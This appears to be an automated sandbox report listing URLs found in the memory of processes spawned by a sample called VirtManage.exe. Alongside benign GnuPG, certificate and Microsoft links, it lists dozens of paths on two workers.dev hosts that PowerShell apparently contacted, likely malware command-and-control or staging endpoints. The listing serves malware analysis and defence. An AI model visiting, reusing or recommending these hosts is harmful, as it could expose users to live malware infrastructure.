Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD90E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3345599262.00000234BDF8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3345599262.00000234BD942000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3345599262.00000234BDCD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3345599262.00000234BDD01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ec2-server.bayaj19162.workers.dev
Source: svchost.exe, 0000001D.00000003.1203909963.0000018B7F530000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DC4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3346373467.000001E94D721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3346373467.000001E94D8F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3346373467.000001E94DCF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3346373467.000001E94D751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3346373467.000001E94D362000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3346373467.000001E94D85D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3346373467.000001E94D396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3346373467.000001E94D9B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nginx-server.paxivo2460.workers.dev
Source: VirtManage.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000017.00000002.3410839615.000001E95C5F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3402127294.00000234CCEC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45codesignca20200V
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3413620030.00000234D4F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000017.00000002.3346373467.000001E94C7A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94C581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3345599262.00000234BCE51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000017.00000002.3346373467.000001E94C7A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45codesignca2020.crt0=
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3413620030.00000234D4F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.915617704.00000000630A7000.00000008.00000001.01000000.0000000C.sdmp, gpg.exe, 00000003.00000002.920512701.00000000630A7000.00000008.00000001.01000000.0000000C.sdmp, gpg.exe, 00000005.00000002.931456572.00000000630A7000.00000008.00000001.01000000.0000000C.sdmp, gpg.exe, 0000000A.00000002.992267349.00000000630A7000.00000008.00000001.01000000.0000000C.sdmp, gpg.exe, 0000000C.00000002.997866045.00000000630A7000.00000008.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.zlib.net/D
Source: powershell.exe, 00000017.00000002.3346373467.000001E94C581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3345599262.00000234BCE51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000017.00000002.3346373467.000001E94C7A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000017.00000002.3346373467.000001E94E59F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3346373467.000001E94E5C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg-agent.exe.0.drString found in binary or memory: https://bugs.gnupg.org
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg-agent.exe.0.drString found in binary or memory: https://bugs.gnupg.orgGnuPGgpggpgsmgpg-agentgpgtarEMAILGNUPGGPGGPGSMGPG_AGENTSCDAEMONTPM2DAEMONDIRMN
Source: powershell.exe, 0000001B.00000002.3402127294.00000234CCEC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001B.00000002.3402127294.00000234CCEC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001B.00000002.3402127294.00000234CCEC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD54A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.b
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD54A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj1
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD54A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD54A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.worke
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD54A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.de
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD87C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3422307009.00000234D5410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000001B.00000002.3345599262.00000234BD54A000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815303867.0000019761ACE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815239590.0000019761ADF000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1817631726.000001976341B000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815378230.0000019761ADF000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1818162447.0000019761A34000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818656888.0000019761A43000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1818288022.0000019761A3A000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1818336435.0000019761A41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//2TGT15/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//54toj/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD8C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//6rbtnMxxv10y0aC/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD8C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//6rbtnMxxv10y0aC/X
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD8C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//6rbtnMxxv10y0aC/p
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//A5iiZ35fPBxq/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//D/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//DGC/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDD01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//ELlFq8DghJwG/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDD01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//ELlFq8DghJwG/p
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDD01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//IqKaO8ROWJzm2yU/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//JA4/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//JWWnmtH4QCwfR/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//Jxxnljedg7S3/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDD01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//KCAKE1z1Kqo6wcb/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDD01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//KyE05/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//L0oe8wZHxLwO2Oz/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//LRLtXY4mUbF/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//LRLtXY4mUbF/p
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//P/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//PUfFT8mzOuxA/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//PfQC2uxgaKZ/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//QvKf4lQ/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//RIPZ/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//RmTVLvFEr1/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//RmTVLvFEr1/p
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//T6Ft/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//TAswTKHs8qzhXjg/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDD01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//Y/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//Z57KoIZrwtX/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDD01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//ZArXzdh2B/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//bTuYBk7MX/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//bmi/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//cedo3Vv/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//e8/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//ftm01GsPbjNqF/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//gJd1ph1r2jf/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//gwOQyuLZR6B5FB/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//hUiWpPOO6/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD993000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//hc4mXSWuVmTMqhy/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDCD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//hc4mXSWuVmTMqhy/p
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//jXNNld0OMq/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//k/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDD01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//l/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//ml/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//o6JCV/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//oPtH3YR/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//osqKq/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//qDVkzlfqqiYTH30/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDD01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//qz/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//rmjS1Nz/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD90E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//rmjS1Nz/wtX//OR/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//sespjFc3mtPiU/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//smT5VjqNG/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//ueWgFP/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//ueWgFP/p
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//v6D/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//vZuD1ACM/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//vZuD1ACM/p
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//vhJnluKFMptEgOR/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//vhqg/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//wdVAkkA5AdZ/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//yTtsOart/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.devp
Source: svchost.exe, 0000001D.00000003.1203909963.0000018B7F589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000001D.00000003.1203909963.0000018B7F530000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3413620030.00000234D4F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: gpg.exe, 0000000C.00000002.998959176.000000006B4A8000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://gnu.org/licenses/
Source: gpg.exe, 0000000C.00000002.998959176.000000006B4A8000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://gnu.org/licenses/gpl.html
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://gnupg.org/faq/subkey-cross-certify.html
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://gnupg.org/faq/subkey-cross-certify.htmlWARNING:
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.drString found in binary or memory: https://gnupg.org0/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE1B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D85D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nginx-server.paxivo2460.workers.dev
Source: powershell.exe, 00000017.00000002.3440402672.000001E9651D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000017.00000002.3346373467.000001E94D185000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287468346.000001F64F19E000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000002.1292787449.000001F64F19F000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287597532.000001F64F17D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287468346.000001F64F18E000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1290506232.000001F64F32B000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287677733.000001F64F18E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nginx-server.paxivo2460.workers.dev/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DC4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nginx-server.paxivo2460.workers.dev//05VQDj/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nginx-server.paxivo2460.workers.dev//0TncPv/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nginx-server.paxivo2460.workers.dev//0pm/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D8F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nginx-server.paxivo2460.workers.dev//1IeCk7PM1e6EFs/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nginx-server.paxivo2460.workers.dev//1OCL4oe/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nginx-server.paxivo2460.workers.dev//1a/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D8F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nginx-server.paxivo2460.workers.dev//2DEJE/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nginx-server.paxivo2460.workers.dev//2THa/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D85D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nginx-server.paxivo2460.workers.dev//2alG/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DC4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nginx-server.paxivo2460.workers.dev//4moV81QFVf4niY/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3346373467.000001E94D6DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nginx-server.paxivo2460.workers.dev//4pEWMhVbtH/
